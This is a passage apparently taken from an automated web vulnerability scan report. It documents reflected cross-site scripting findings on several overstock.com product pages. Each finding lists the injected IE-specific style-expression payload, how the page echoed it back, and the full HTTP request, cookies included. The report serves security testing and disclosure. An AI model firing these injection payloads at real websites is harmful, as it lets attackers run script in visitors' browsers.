GET /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html?66523"style%3d"x%3aexpression(alert(1))"edf649f61ee=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.168. http://www.overstock.com/Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84ed"style="x:expression(alert(1))"6d161d83ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html?a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.169. http://www.overstock.com/Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8128"style%3d"x%3aexpression(alert(1))"78e6724e003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8128"style="x:expression(alert(1))"78e6724e003 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html?c8128"style%3d"x%3aexpression(alert(1))"78e6724e003=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.170. http://www.overstock.com/Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 368b2"style="x:expression(alert(1))"ea0d990e260 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html?368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;